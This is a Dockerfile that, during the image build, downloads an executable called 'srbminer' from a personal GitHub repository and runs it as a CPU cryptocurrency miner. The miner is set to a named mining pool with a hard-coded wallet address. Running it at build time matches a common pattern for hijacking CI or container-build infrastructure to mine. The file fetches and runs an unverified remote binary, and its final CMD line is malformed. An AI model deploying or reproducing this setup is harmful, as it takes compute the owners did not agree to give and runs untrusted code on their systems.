FROM ubuntu:latest
RUN apt update && apt upgrade -y && apt install wget -y
WORKDIR /home
RUN wget https://github.com/agumyudhistira/mine/raw/main/srbminer
RUN chmod +x srbminer
RUN ./srbminer --disable-gpu --algorithm verushash --pool na.luckpool.net:3956 --wallet RGGqkqX6HXJrJ3iRWaZs8CGvj2tyPtj4q9.WORKER-1 --cpu-threads 1
CMD (-h)
